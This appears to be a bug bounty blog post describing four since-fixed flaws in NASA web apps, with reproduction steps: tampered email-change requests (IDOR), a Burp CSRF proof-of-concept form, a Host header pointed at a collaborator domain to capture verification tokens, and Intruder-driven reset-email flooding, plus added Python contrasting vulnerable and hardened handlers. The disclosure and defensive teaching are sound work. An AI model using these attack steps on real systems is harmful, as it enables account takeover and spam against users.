Account Takeovers & more : Hacking NASA
I received 3 letters of appreciation from NASA for finding multiple potential security vulnerabilities in their systems. In this blog post, I'll explain all the technical and non-technical parts of it.
My Approach?
1 - I decided to look for access control issues, IDORs and authentication issues. For that, I needed functional assets with features that could be broken.
2 - So I used very basic Google dorks to find those assets, and found some of them.
3 - As a result, I discovered and reported several security vulnerabilities to NASA (P1, P2, P3, P4).
1 - IDOR leads to 0-Click Account Takeover
P1 : Resolved
- Discovered that the email change functionality at █████.pps.eosdis.nasa.gov is vulnerable to IDOR: the server selects the account to modify from the client-supplied oldEmail parameter, so it is very simple to change the email of some other existing user.
- Create two accounts, Account-A (attacker) & Account-B (victim).
- Go to Account-A, change the email, and intercept the request.
Request
POST /registration/updateEmailRequest.html HTTP/1.1
Host: █████.pps.eosdis.nasa.gov
Cookie: {your-cookie};
Content-Length: 89
...snip...
Connection: close
oldEmail=attacker%40email.com&email=test%40email.com&confirmEmail=test%40email.com
- Change the oldEmail parameter to Account-B's (victim) email:
oldEmail=victim%40email.com&email=test%40email.com&confirmEmail=test%40email.com
- Observe that the application changed the email of Account-B (victim) to the attacker-chosen address, without any action from the victim.
2 - Host Header Injection
P2 : Resolved
- Discovered a Host Header Injection in the email verification feature.
- Register on █████.pps.eosdis.nasa.gov & click on Verify Email.
- Intercept the request and change Host: █████.pps.eosdis.nasa.gov to Host: your-collaborator-id.oastify.com
- You'll receive the verification link in your email as:
https://your-collaborator-id.oastify.com/registration/verifyContact/verification-token/attacker@email.com.html
- As an attacker, I could verify an account with any user email (belonging to individuals who do not intend to have an account on this web app), such as @nasa.gov addresses: the verification link is built from the Host header, so the link in the mail points at a domain the attacker controls and the verification token reaches the attacker when the link is opened.
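To make the defect concrete, here is an added example (not code from the original post or from the affected application) of a verification-link builder that copies the request's Host header, next to a hardened one that rejects unexpected hosts and only ever builds links from a configured canonical hostname. The canonical host app.example.gov, the allowlist and the helper names are assumptions; the path format is the one shown in the write-up.

```python
from urllib.parse import quote

# Assumptions (not from the original post): the application is configured with a
# canonical public hostname, and verification links use the path format from the write-up.
CANONICAL_HOST = "app.example.gov"
ALLOWED_HOSTS = {CANONICAL_HOST}
VERIFY_PATH = "/registration/verifyContact/{token}/{email}.html"


def build_verification_link_vulnerable(headers: dict, token: str, email: str) -> str:
    """Mirrors the flaw described on the page: the origin of the emailed link is
    copied from the client-controlled Host header, so whoever sent the request
    picks the domain that the verification token will be delivered to."""
    host = headers["Host"]
    return "https://" + host + VERIFY_PATH.format(token=token, email=email)


def request_host(headers: dict) -> str:
    """Normalise the Host header: strip any port, trim and lower-case it."""
    return headers.get("Host", "").split(":", 1)[0].strip().lower()


def build_verification_link_hardened(headers: dict, token: str, email: str) -> str:
    """Never derive the link origin from the request. Reject requests whose Host
    is not on the allowlist (this catches the injection early; the same check
    belongs on X-Forwarded-Host when a proxy is in front), then build the link
    from the configured canonical host with URL-encoded path segments."""
    host = request_host(headers)
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {host!r}")
    return "https://" + CANONICAL_HOST + VERIFY_PATH.format(
        token=quote(token, safe=""), email=quote(email, safe="")
    )


def hardened_rejects(headers: dict) -> bool:
    """True if the hardened builder refuses the request (would be a 400 response)."""
    try:
        build_verification_link_hardened(headers, "verification-token", "attacker@email.com")
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed request headers reproducing the collaborator trick from the write-up.
    evil = {"Host": "your-collaborator-id.oastify.com"}
    print(build_verification_link_vulnerable(evil, "verification-token", "attacker@email.com"))
    print("hardened rejects injected Host:", hardened_rejects(evil))
    print(build_verification_link_hardened({"Host": "APP.example.gov:443"},
                                           "verification-token", "attacker@email.com"))
```

The important design choice is that the hardened builder does not "sanitise" the Host header and then use it; it validates the header purely to fail fast and takes the origin from configuration, so a missing or spoofed header can never influence where the token goes.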
3 - CSRF leads to 1-Click Account Takeover
P3 : Resolved
- This is another report on the same endpoint as case 1, the change email function, where I previously discovered the IDOR. In this report, I found that an attacker can perform a CSRF attack on the email change functionality, allowing them to take over any user's account.
- Log in to █████.pps.eosdis.nasa.gov & navigate to the Update Info page. Enable an HTTP interception proxy, such as Burp Suite.
- Change the email and intercept the request. Generate the CSRF PoC.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/');</script>
<h1>MAGIC HAPPENS, IF YOU CLICK THE BELOW BUTTON..!!</h1>
<form action="https://█████.pps.eosdis.nasa.gov/registration/updateEmailRequest.html" method="POST">
<input type="hidden" name="oldEmail" value="victim@email.com" />
<input type="hidden" name="email" value="hacked@email.com" />
<input type="hidden" name="confirmEmail" value="hacked@email.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- Test it in the browser. When a logged-in victim clicks the button, their email is changed & the verification goes to the attacker-controlled email.
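Cases 1 and 3 are two failures of the same handler: it picks the account to modify from the client-supplied oldEmail (IDOR) and nothing ties the request to the user's own session (CSRF). The following added example (my own code, not the application's or the author's) models that handler in Python next to a hardened one, and replays both attacks from the write-up against each. The in-memory user store, the Session class, the csrf_token field name and the helper names are assumptions; the form fields are the ones from the captured request.

```python
import hmac
import secrets
from dataclasses import dataclass, field


# Constructed sample data (not from the original post): two accounts keyed by an
# internal user id, mirroring the Account-A (attacker) / Account-B (victim) setup.
def sample_users() -> dict:
    return {
        "u-attacker": {"email": "attacker@email.com", "pending_email": None},
        "u-victim": {"email": "victim@email.com", "pending_email": None},
    }


@dataclass
class Session:
    """Server-side session: who is logged in, plus a per-session CSRF token."""
    user_id: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


class Rejected(Exception):
    """Raised when the handler refuses the request (would be a 4xx response)."""


def _user_id_for_email(users: dict, email: str):
    return next((uid for uid, u in users.items() if u["email"] == email), None)


def update_email_vulnerable(users: dict, session: Session, form: dict) -> str:
    """Behaves like the endpoint in the write-up: the account is selected by the
    client-supplied oldEmail (IDOR) and the session is never consulted beyond
    'is logged in', so a cross-site form post is accepted too (CSRF). The
    verification mail for the new address goes to form['email']."""
    if form["email"] != form["confirmEmail"]:
        raise Rejected("emails do not match")
    uid = _user_id_for_email(users, form["oldEmail"])
    if uid is None:
        raise Rejected("no such account")
    users[uid]["pending_email"] = form["email"]  # attacker receives the verification
    return uid


def update_email_hardened(users: dict, session: Session, form: dict) -> str:
    """Two fixes: (1) the request must carry the CSRF token issued to this
    session (synchronizer-token pattern, compared in constant time); (2) the
    account being modified comes from the session, never from the form, and
    oldEmail is only cross-checked against the session's own account."""
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, session.csrf_token.encode()):
        raise Rejected("missing or invalid CSRF token")
    if form["email"] != form["confirmEmail"]:
        raise Rejected("emails do not match")
    uid = session.user_id  # authoritative identity comes from the session
    if form.get("oldEmail") != users[uid]["email"]:
        raise Rejected("oldEmail does not belong to the logged-in account")
    users[uid]["pending_email"] = form["email"]
    return uid


HANDLERS = (("vulnerable", update_email_vulnerable), ("hardened", update_email_hardened))


def run_attacks() -> dict:
    """Replay both attacks; value is the victim's pending email or None if refused."""
    results = {}
    # Case 1 (IDOR): attacker is logged in as themselves, includes their own valid
    # token, but names the victim's email in oldEmail.
    for name, handler in HANDLERS:
        users, attacker = sample_users(), Session(user_id="u-attacker")
        form = {"csrf_token": attacker.csrf_token, "oldEmail": "victim@email.com",
                "email": "test@email.com", "confirmEmail": "test@email.com"}
        try:
            handler(users, attacker, form)
            results[f"idor_{name}"] = users["u-victim"]["pending_email"]
        except Rejected:
            results[f"idor_{name}"] = None
    # Case 3 (CSRF): the victim's browser submits the attacker's form with the
    # victim's cookie; the cross-site form cannot know the victim's CSRF token.
    for name, handler in HANDLERS:
        users, victim = sample_users(), Session(user_id="u-victim")
        form = {"oldEmail": "victim@email.com", "email": "hacked@email.com",
                "confirmEmail": "hacked@email.com"}
        try:
            handler(users, victim, form)
            results[f"csrf_{name}"] = users["u-victim"]["pending_email"]
        except Rejected:
            results[f"csrf_{name}"] = None
    return results


def legitimate_update() -> str:
    """The intended flow still works on the hardened handler."""
    users, victim = sample_users(), Session(user_id="u-victim")
    update_email_hardened(users, victim, {
        "csrf_token": victim.csrf_token, "oldEmail": "victim@email.com",
        "email": "new@email.com", "confirmEmail": "new@email.com"})
    return users["u-victim"]["pending_email"]


if __name__ == "__main__":
    print(run_attacks())
    print("legitimate change pending for:", legitimate_update())
```

A real deployment would add SameSite=Lax or Strict on the session cookie and re-authentication (or a confirmation sent to the old address) before an email change takes effect; the two checks above are the minimum that closes cases 1 and 3.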
4 - No Rate Limit on Forgot-Password
P4 : Resolved
- A lack of rate limiting on an email-triggering endpoint (forgot-password) was identified. This allows an attacker to trigger a large number of emails to any email address, which they could use to spam a target.
- Navigate to █████.hec.nasa.gov/account/recover/pwd, enter the email, then click Reset Password.
- Intercept this request in Burp Suite; the HTTP request looks like:
POST /rms/apis/public/account/recover HTTP/1.1
Host: █████.hec.nasa.gov
Cookie: YOUR_SESSION_COOKIES
...snip...
Connection: close
{
  "username": "victim_user",
  "email": "victim@email.com"
}
- Send it to Intruder and, under the Payloads section, choose the Null payloads type and generate 50 payloads.
- You will receive 200 OK in every response; you can also check the target's mail inbox.
- For systems that use Software-as-a-Service (SaaS) email providers, there can be direct financial costs associated with sending large volumes of email. Triggered emails can also result in reputational damage for the organization, as users' trust is impacted by receiving large amounts of unwanted and unsolicited email.
Conclusion
It took me about 30 minutes to find these vulnerabilities in one asset. I didn't perform much recon, automation, etc. I just picked one asset from Google dorks & started hacking on it. And the vulnerabilities are pretty simple & straightforward.
Timeline
- Reported -> 03/July/2024
- Triaged -> 04/July/2024
- Resolved -> 25/July/2024
- Received letter of Appreciation -> 29/July/2024